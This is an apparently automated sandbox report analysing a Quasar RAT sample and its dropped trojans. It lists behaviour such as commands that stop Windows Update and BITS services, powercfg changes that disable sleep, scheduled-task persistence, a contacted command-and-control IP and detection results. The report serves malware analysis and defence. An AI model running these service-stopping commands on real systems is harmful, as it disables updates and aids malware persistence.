Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Windows\System32\dialer.exe

Code function: 51_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

51_2_0000000140001B54

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe

Code function: 0_2_00007FF731CA06D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF731CA06D4

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe

Code function: 0_2_00007FF731C85164 GetVersionExW,

0_2_00007FF731C85164

Source: C:\Users\user\Desktop\F4R5fd8grr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0

Stops critical windows services

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc

Stealing of Sensitive Information

Yara detected Quasar RAT

Source: Yara match	File source: 5fr5gthkjdg71.exe, type: SAMPLE
Source: Yara match	File source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.1691589701.0000000000EF0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5fr5gthkjdg71.exe PID: 7452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: F4R5fd8grr.exe PID: 7548, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Client.exe PID: 7916, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPED

Remote Access Functionality

Yara detected Quasar RAT

Source: Yara match	File source: 5fr5gthkjdg71.exe, type: SAMPLE
Source: Yara match	File source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.1691589701.0000000000EF0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5fr5gthkjdg71.exe PID: 7452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: F4R5fd8grr.exe PID: 7548, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Client.exe PID: 7916, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	11 DLL Side-Loading	1 Exploitation for Privilege Escalation	21 Disable or Modify Tools	11 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Native API	11 Windows Service	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	11 Input Capture	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Command and Scripting Interpreter	2 Scheduled Task/Job	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	45 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Scheduled Task/Job	Login Hook	1 Access Token Manipulation	3 Obfuscated Files or Information	NTDS	231 Security Software Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Service Execution	Network Logon Script	11 Windows Service	1 Software Packing	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	1 PowerShell	RC Scripts	912 Process Injection	11 DLL Side-Loading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	2 Scheduled Task/Job	1 File Deletion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	13 Masquerading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	31 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	912 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Hidden Files and Directories	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
5fr5gthkjdg71.exe	76%	Virustotal		Browse
5fr5gthkjdg71.exe	63%	ReversingLabs	Win64.Backdoor.Quasarrat
5fr5gthkjdg71.exe	100%	Avira	TR/Kryptik.cjmob
5fr5gthkjdg71.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\Desktop\F4R5fd8grr.exe	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Roaming\SubDir\Client.exe	100%	Avira	HEUR/AGEN.1307453
C:\Program Files\Cuis\bon\Bara.exe	100%	Avira	HEUR/AGEN.1329574
C:\Users\user\Desktop\GR55Qg1hth.exe	100%	Avira	HEUR/AGEN.1329574
C:\Users\user\AppData\Local\Temp\FA9.tmp	100%	Avira	TR/Dropper.MSIL.Gen
C:\Users\user\Desktop\F4R5fd8grr.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\SubDir\Client.exe	100%	Joe Sandbox ML
C:\Program Files\Cuis\bon\Bara.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\GR55Qg1hth.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\FA9.tmp	100%	Joe Sandbox ML
C:\Program Files\Cuis\bon\Bara.exe	91%	ReversingLabs	Win64.Trojan.SpyLoader
C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	92%	ReversingLabs	Win64.Packed.Generic
C:\Users\user\AppData\Local\Temp\FA9.tmp	68%	ReversingLabs	ByteCode-MSIL.Trojan.InjectorX
C:\Users\user\AppData\Roaming\SubDir\Client.exe	96%	ReversingLabs	ByteCode-MSIL.Backdoor.Quasar
C:\Users\user\Desktop\F4R5fd8grr.exe	96%	ReversingLabs	ByteCode-MSIL.Backdoor.Quasar
C:\Users\user\Desktop\GR55Qg1hth.exe	96%	ReversingLabs	Win64.Trojan.SpyLoader
C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	92%	ReversingLabs	Win64.Packed.Generic
C:\Windows\Temp\dsarrsulkovb.sys	5%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://go.micC	0%	Avira URL Cloud	safe
185.148.3.216	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
185.148.3.216	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	5fr5gthkjdg71.exe, 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, F4R5fd8grr.exe, 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000013.00000002.1901832546.0000021C90078000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	5fr5gthkjdg71.exe, 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, F4R5fd8grr.exe, 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp, Client.exe, 0000000A.00000002.1835510769.0000000002701000.00000004.00000800.00020000.00000000.sdmp	false		high
http://go.micC	Client.exe, 0000000A.00000002.1831773970.00000000008F4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/11564914/23354;	5fr5gthkjdg71.exe, 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, F4R5fd8grr.exe, 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp	false		high
https://contoso.com/	powershell.exe, 00000013.00000002.1901832546.0000021C90078000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000013.00000002.1901832546.0000021C90078000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000013.00000002.1901832546.0000021C90078000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tools.keycdn.com/geo.json	5fr5gthkjdg71.exe, 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, F4R5fd8grr.exe, 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000013.00000002.1901832546.0000021C90078000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000013.00000002.1813131707.0000021C80001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354sCannot	5fr5gthkjdg71.exe, 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, F4R5fd8grr.exe, 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	F4R5fd8grr.exe, 00000003.00000002.1725151297.0000000003121000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000A.00000002.1835510769.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, F4R5fd8grr.exe, 0000000B.00000002.1884972247.0000000002ABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1813131707.0000021C80001000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.148.3.216	unknown	Finland		203003	MAGNA-CAPAXFI	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583267
Start date and time:	2025-01-02 09:57:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	71
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	5fr5gthkjdg71.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@124/27@0/1
EGA Information:	Successful, ratio: 91.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 104 Number of non-executed functions: 187
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.95.31.18, 20.242.39.171, 2.22.50.131, 2.22.50.144, 13.107.246.45
Excluded domains from analysis (whitelisted): usa-east.raptoreum.zone, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Execution Graph export aborted for target powershell.exe, PID 8156 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:57:59	API Interceptor	1x Sleep call for process: GR55Qg1hth.exe modified
03:57:59	API Interceptor	1x Sleep call for process: gfiKDLgr58thy4d.exe modified
03:58:01	API Interceptor	100x Sleep call for process: powershell.exe modified
03:58:06	API Interceptor	54x Sleep call for process: Client.exe modified
03:58:42	API Interceptor	14963x Sleep call for process: winlogon.exe modified
08:58:03	Task Scheduler	Run new task: 3dfx Startup path: C:\Users\user\Desktop\F4R5fd8grr.exe
08:58:12	Task Scheduler	Run new task: Barac path: C:\Program Files\Cuis\bon\Bara.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	hcxmivKYfL.exe	Get hash	malicious	RedLine	Browse	199.232.210.172
	WN3Y9XR9c7.exe	Get hash	malicious	AsyncRAT	Browse	199.232.210.172
	test.doc.bin.doc	Get hash	malicious	Unknown	Browse	199.232.214.172
	test.doc.bin.doc	Get hash	malicious	Unknown	Browse	199.232.210.172
	ROtw3Hvdow.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	vfrcxq.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	199.232.210.172
	trwsfg.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	199.232.214.172
	vj0Vxt8xM4.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	Dd5DwDCHJD.exe	Get hash	malicious	Quasar	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MAGNA-CAPAXFI	Hilix.arm7.elf	Get hash	malicious	Mirai	Browse	185.148.4.122
	m68k.elf	Get hash	malicious	Mirai	Browse	185.148.4.101
	na.elf	Get hash	malicious	Unknown	Browse	185.148.4.104
	na.elf	Get hash	malicious	Mirai	Browse	185.148.4.111
	ptlnPI85Nk.elf	Get hash	malicious	Mirai	Browse	185.148.17.106
	1FYNsY2F1u.elf	Get hash	malicious	Mirai	Browse	185.148.17.110
	BS3MzMsfDa.elf	Get hash	malicious	Mirai	Browse	185.148.4.115
	a2bmiIcQOR.elf	Get hash	malicious	Mirai	Browse	185.148.4.116
	U4HipSF3yX.elf	Get hash	malicious	Mirai	Browse	185.148.4.107
	notabotnet.x86.elf	Get hash	malicious	Mirai	Browse	185.148.17.101

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\FA9.tmp	Installer.exe	Get hash	malicious	Raccoon Stealer v2	Browse
	softwareinstaller.exe	Get hash	malicious	Laplas Clipper, RedLine	Browse
	N2wufLmC74.exe	Get hash	malicious	Raccoon Stealer v2, RedLine	Browse
	setup.exe	Get hash	malicious	RedLine	Browse
	hZDPlQwZ9D.exe	Get hash	malicious	RedLine, Xmrig	Browse
	cfBJlHsOsz.exe	Get hash	malicious	RedLine	Browse
	FKN6uh7y01.exe	Get hash	malicious	RedLine	Browse
